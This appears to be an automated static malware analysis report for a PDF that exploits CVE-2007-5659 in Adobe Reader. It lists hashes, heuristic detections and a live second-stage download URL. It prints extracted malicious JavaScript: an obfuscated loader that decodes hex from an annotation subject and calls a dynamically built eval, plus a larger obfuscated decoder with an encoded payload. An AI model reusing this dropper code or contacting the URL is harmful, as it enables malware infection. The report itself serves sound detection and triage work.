Malicious PDF — malware analysis report

Static analysis result for SHA-256 894421ed4ee4b480…

MALICIOUS

PDF

15.2 KB
MD5: 0b7c24aeaf5412d2b39ff24ac0a4511c
SHA-1: 6f89d7f801673f47e8a42b8958b513f2100432ea
SHA-256: 894421ed4ee4b4801476c374e3c61cbeff887a157d539c9edc743efd204722b6
Risk Score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script decodes a URL from the annotation subject and uses it to download a second-stage payload. The embedded URL http://webgetwise.com/cgi-bin/176/n002106201r0019Ra001e36bX344d38beY3da376f1Z0100f060 is critical for this attack chain.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 [severity: critical; CVE match: exact; rule: CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action [severity: low; 5 related findings; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster [severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper [severity: high; rule: PDF_JS_OBFUSCATED_DROPPER]
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF exploit shellcode contains an embedded download URL [severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [severity: low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 [severity: critical; rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact [severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [severity: info; rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://webgetwise.com/cgi-bin/176/n002106201r0019Ra001e36bX344d38beY3da376f1Z0100f060 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename / Kind / Source / Size
javascript_obj0005_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream; Source: PDF /JS object 5 at offset 0x148; Size: 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
SHA-256: 99bb28ace86cea1f505b82e03201c16f6a8b01eaf794df5567f4c223a6b24195
Kind: deobfuscated-js; Source: repeated-marker hex decoded JavaScript at offset 0x19B4; Size: 12072 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function o__18kK_D_gn(a2_Kan, ouTrFX8){var r_iN5edFgcv = 20;var D___fD = 0;var J_A__2xYnS5_f = 512;var gL61J2QJ55h = r_iN5edFgcv;var ad1eKoL1 = "";var RKNS_7 = 4;var L543t4l = this;var O__K__50RAm26M = "1234ee";var O72JT6u7__1cI3 = arguments;try {var b772Y_e = 0;if (app) {gL61J2QJ55h = gL61J2QJ55h + 2;ouTrFX8 = pr[b772Y_e].subject;}O__K__50RAm26M = O__K__50RAm26M.replace(/\d+/, "call");} catch(e) { }gL61J2QJ55h = gL61J2QJ55h - r_iN5edFgcv;var HU6pgciBj = new Array();var WvV_s_oC_a7u4 = 150;if (WvV_s_oC_a7u4 > 0) {HU6pgciBj[0] = WvV_s_oC_a7u4;HU6pgciBj[1] = J_A__2xYnS5_f;HU6pgciBj[0] = HU6pgciBj[0] - WvV_s_oC_a7u4;HU6pgciBj[2] = HU6pgciBj[0];HU6pgciBj[1] = HU6pgciBj[1] - J_A__2xYnS5_f;HU6pgciBj[3] = HU6pgciBj[1];}if (a2_Kan) { HU6pgciBj = a2_Kan;}if (!a2_Kan) {var H2Ga_C0_t_lKo = O72JT6u7__1cI3[O__K__50RAm26M].toString();var i_ts6_X2aV = 0;var Sk8Y_RPm_J = i_ts6_X2aV;WvV_s_oC_a7u4 = WvV_s_oC_a7u4 - 102;var otec51_FOmhAr = 0;while(Sk8Y_RPm_J < H2Ga_C0_t_lKo.length) {otec51_FOmhAr = H2Ga_C0_t_lKo.charCodeAt(Sk8Y_RPm_J);if (otec51_FOmhAr >= WvV_s_oC_a7u4 && otec51_FOmhAr <= 57) {if (i_ts6_X2aV == RKNS_7) {i_ts6_X2aV = -1;}if (i_ts6_X2aV < 0) { i_ts6_X2aV = 0; }HU6pgciBj[i_ts6_X2aV] += otec51_FOmhAr;if (HU6pgciBj[i_ts6_X2aV] > J_A__2xYnS5_f) {HU6pgciBj[i_ts6_X2aV] -= J_A__2xYnS5_f;}i_ts6_X2aV = i_ts6_X2aV + 1;}Sk8Y_RPm_J = Sk8Y_RPm_J + 1;}}var X_m_1V7Ogi = 0;var x4v8_haTBt = 0;var N_n1aQ_H4 = -1;var e_ju50_X87h_0 = 0;var W___H88S0 = 0;do {var lT1__o_p = 256;if (HU6pgciBj[e_ju50_X87h_0] > lT1__o_p) {HU6pgciBj[e_ju50_X87h_0] -= lT1__o_p;}e_ju50_X87h_0 = e_ju50_X87h_0 + 1;} while (e_ju50_X87h_0 < RKNS_7);e_ju50_X87h_0 = e_ju50_X87h_0 - RKNS_7;while(e_ju50_X87h_0 < ouTrFX8.length) {var I0_TdCrFe_YQw78 = ouTrFX8.substr(e_ju50_X87h_0, 1) + ' V V ';e_ju50_X87h_0 = e_ju50_X87h_0 + 1;var dyw_T_6sS5_f = parseInt(I0_TdCrFe_YQw78, r_iN5edFgcv);if (N_n1aQ_H4 != -1) {x4v8_haTBt += dyw_T_6sS5_f;if (X_m_1V7Ogi == RKNS_7) {X_m_1V7Ogi = 0;}var o_8Hl__6k86r = x4v8_haTBt;o_8Hl__6k86r = 
o_8Hl__6k86r - (W___H88S0 + 2) * HU6pgciBj[X_m_1V7Ogi];if (o_8Hl__6k86r <= 0) {o_8Hl__6k86r = o_8Hl__6k86r - Math.floor(o_8Hl__6k86r / 256) * 256;}o_8Hl__6k86r = String.fromCharCode(o_8Hl__6k86r);if (gL61J2QJ55h == 1) {ad1eKoL1 += dyw_T_6sS5_f;} else if (gL61J2QJ55h == 2) {ad1eKoL1 += o_8Hl__6k86r;} else {ad1eKoL1 += e_ju50_X87h_0;N_n1aQ_H4 = -2;}N_n1aQ_H4 = -1;X_m_1V7Ogi = X_m_1V7Ogi + 1;W___H88S0 = W___H88S0 + 1;} else if (N_n1aQ_H4 == -1) {N_n1aQ_H4 = r_iN5edFgcv;x4v8_haTBt = dyw_T_6sS5_f * r_iN5edFgcv;}}var f4n__Pu = this;f4n__Pu['ev'+'al'](ad1eKoL1);}
	o__18kK_D_gn(0, "ag9f0e305j8d8gcd3d383f7gbf0ab275bdb63h3i88cb1d901f8d967h28563j359h7d8jcb7h365j8b412h162abibb5cb0a5c83ha65iaaac366f7a6b0d0e22cd709g047b6aaj204b347701027g3aa38180cd5e133aaf368f9d873e4j8c582ba40c25037603c1a82f8b8j8bb4592f856e0d381e0582bb0g8h5i62bj041j67b4bbaf2g9d636dcf8621cab26987c080434e7716bf9j42130c3cc4bj8717736j638d1g2f7d5d980316965a9h2g835a5i1c291a2aa380782d955357c975ac17993694704f020c4706038c0409c15faja5a1b46j75629gcc2a2i35aa0b20bh868c2e6d4a89121gaf1i9f706c218h434bbh6h9c0b8h2i846f3503bc6f400jaeb0b79c577i7e7707304j4a88254c6d2h9h184e7c6d940j363980a017014cb9948eba77101gb569ajcb85493c8b550a2420biaj61ada5bf42646663c16754775eb81f34237iai0j9j3973ai5f0h4gcd9i901bad4055aa6f023b88427dc754525f735e30094a21a259aa8f91358i5662952a614c3cb13128149d0435985g62bj1db03j8j80bb0287426fag5ebd2f6i3j5g7i4e0c0g470i079e3bbcaa49c7917635818a999h0c576g189g0b2803669e037j22960f320j6ebe70650j622i2d968d9g01785h5e84433hcc4906b088cca4a52cc9aeb3b96b6d736521263j4f01ai278469902d421g5f0db09j1ib6a5691d853525aj4i9h1f9j3189ah7136296033aia429abb54395778fac417h8f522g3j682jc0120a8c3g8abf24474602199d419h75590b6a114jc736959854222i582dc2185d030183c99fa71g75a5a79f247b886d26ce611b7g0c10975bajai2dbg5d9j01ac3hai7i79b4922j27be70a9ca81162d5e1j050942b6a28bcb92b80a8b7h9j82545f7c5j1c2i1ebd7d920b5d24adaa43173ic48ia32daf30499i4cbcbi6i315gbf71164a4e41110113ae1371c8bhafb88584566g4b4h4252a61h3h0d62c62f824j9e0ic0a53j827i6dc6ad2063c94i0ebi994d91704f02ce3g12b08jbg1jca6h8h9h99cd4d67626943572i1h8cb01h864c89be733f5e0cbicb49bj605jbe5g381a8e458g109j2f6b8f4j0b11
... (truncated)
deobfuscated.js
SHA-256: 826a2b88ae5227267459a7498e6aa99fbb948610b782a1c81f8959f6fd0eee5b
Kind: deobfuscated-js; Source: PDF JavaScript deobfuscation pass; Size: 121629 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

... (truncated)